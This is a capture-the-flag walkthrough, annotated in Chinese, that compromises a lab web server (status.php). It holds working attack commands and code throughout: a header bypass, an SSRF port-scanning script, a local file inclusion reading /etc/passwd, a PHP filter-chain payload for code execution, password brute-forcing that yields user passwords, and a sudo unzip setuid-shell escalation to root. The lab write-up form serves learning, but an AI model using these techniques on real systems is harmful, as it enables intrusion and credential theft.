Nmap #
[root@kali] /home/kali/status
❯ nmap 172.17.0.2 -A -p-
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.58 ((Ubuntu))
|_http-server-header: Apache/2.4.58 (Ubuntu)
|_http-title: Web Bunkeriana
只开放了80
端口
Gobuser #
[root@kali] /home/kali/status
❯ gobuster dir -u http://172.17.0.2 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php ⏎
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://172.17.0.2
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 5197]
/status.php (Status: 403) [Size: 5197]
/.php (Status: 403) [Size: 5197]
/server-status (Status: 403) [Size: 5197]
Progress: 441120 / 441122 (100.00%)
===============================================================
Finished
===============================================================
查看到有一个status.php
,状态码是403
Statusid
是0,尝试将其修改为1
[root@kali] /home/kali/status
❯ curl http://172.17.0.2/status.php -H "Statusid: 1" ⏎
<h1>Server Status</h1>
<p>200</p>
<h1>Check Status</h1>
<form method="POST">
<input type="url" name="url" placeholder="http://example.com" required>
<button>Send</button>
</form>
<footer style="position: fixed; bottom: 10px; right: 10px; font-size: 0.9em; color: gray;">
v0.2
</footer>
可以提交一个url
参数
SSRF #
不能直接读取文件,那么进行内网端口探测
import requests
target = "http://172.17.0.2/status.php"
for port in range(1, 65536):
url_to_check = f"http://127.0.0.1:{port}"
payload = {'url': url_to_check}
try:
response = requests.post(url=target, data=payload, headers={'Statusid': '1'})
if 'HTTP Status: 0' not in response.text:
print(f"[+] Port open: {port}")
except Exception:
continue
file.php
可以进行文件包含
[root@kali] /home/kali/status/backup_5025a3123660d066c9ba8617c0cd92d5/061400ca5d384de48f37a71ec23cc518/cc8e38c20e4e2f58291c0f8b2e3ace5f/dev
❯ ls
file.php status.php
[root@kali] /home/kali/status/backup_5025a3123660d066c9ba8617c0cd92d5/061400ca5d384de48f37a71ec23cc518/cc8e38c20e4e2f58291c0f8b2e3ace5f/dev
❯ cat file.php
<?php
if($_SERVER['REQUEST_METHOD'] === 'GET'){
$file = $_GET['72e22dffd7fa10883a85aa3e0bbbd6d4'];
include($file);
}
?>#
Include #
可以如下访问得到/etc/passwd
http://172.17.0.2/061400ca5d384de48f37a71ec23cc518/cc8e38c20e4e2f58291c0f8b2e3ace5f/dev/file.php?72e22dffd7fa10883a85aa3e0bbbd6d4=/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
baluton:x:1001:1001:baluton,,,:/home/baluton:/bin/bash
_galera:x:100:65534::/nonexistent:/usr/sbin/nologin
mysql:x:101:102:MariaDB Server,,,:/nonexistent:/bin/false
redghost:x:1002:1002:redghost,,,:/home/redghost:/bin/bash
尝试使用filterchains
来进行命令执行
[root@kali] /home/kali/Desktop/php_filter_chain_generator (main)
❯ python php_filter_chain_generator.py --chain '<?php system($_GET["a"]);?>'
[+] The following gadget chain will generate the following code : <?php system($_GET["a"]);?> (base64 value: PD9waHAgc3lzdGVtKCRfR0VUWyJhIl0pOz8+)
php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16|convert.iconv.WINDOWS-1258.UTF32LE|convert.iconv.ISIRI3342.ISO-IR-157|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.
<skip>
shell
SuForce #
没有找到可以利用的东西,进行密码爆破一下
www-data@f0f1168fc905:/var/www/html$ ./suForce -u baluton -w rockyou.txt
_____
___ _ _ | ___|__ _ __ ___ ___
/ __| | | || |_ / _ \| '__/ __/ _ \
\__ \ |_| || _| (_) | | | (_| __/
|___/\__,_||_| \___/|_| \___\___|
───────────────────────────────────
code: d4t4s3c version: v1.0.0
───────────────────────────────────
🎯 Username | baluton
📖 Wordlist | rockyou.txt
🔎 Status | 40/14344392/0%/123123
💥 Password | 123123
───────────────────────────────────
baluton@f0f1168fc905:/var/www/html$ ./suForce -u redghost -w rockyou.txt
_____
___ _ _ | ___|__ _ __ ___ ___
/ __| | | || |_ / _ \| '__/ __/ _ \
\__ \ |_| || _| (_) | | | (_| __/
|___/\__,_||_| \___/|_| \___\___|
───────────────────────────────────
code: d4t4s3c version: v1.0.0
───────────────────────────────────
🎯 Username | redghost
📖 Wordlist | rockyou.txt
🔎 Status | 104/14344392/0%/estrella
💥 Password | estrella
───────────────────────────────────
Root #
类似于Bola
baluton@8470eb7f0e97:/home$ sudo -l
Matching Defaults entries for baluton on 8470eb7f0e97:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User baluton may run the following commands on 8470eb7f0e97:
(ALL) NOPASSWD: /usr/bin/unzip
baluton@8470eb7f0e97:~$ cp /bin/sh .
baluton@8470eb7f0e97:~$ chmod +s sh
baluton@8470eb7f0e97:~$ zip shell.zip sh
adding: sh (deflated 52%)
baluton@8470eb7f0e97:~$ sudo unzip -K shell.zip
Archive: shell.zip
replace sh? [y]es, [n]o, [A]ll, [N]one, [r]ename: y
inflating: sh
baluton@8470eb7f0e97:~$ ./sh -p
# id
uid=1001(baluton) gid=1001(baluton) euid=0(root) egid=0(root) groups=0(root),100(users),1001(baluton)
或者解压根目录的压缩包,也有密码
baluton@8470eb7f0e97:~$ cat regalitoregalazoregalin.txt
root:balulonbalulinbalutonjeje
baluton@8470eb7f0e97:~$ su root
Password:
root@8470eb7f0e97:/home/baluton#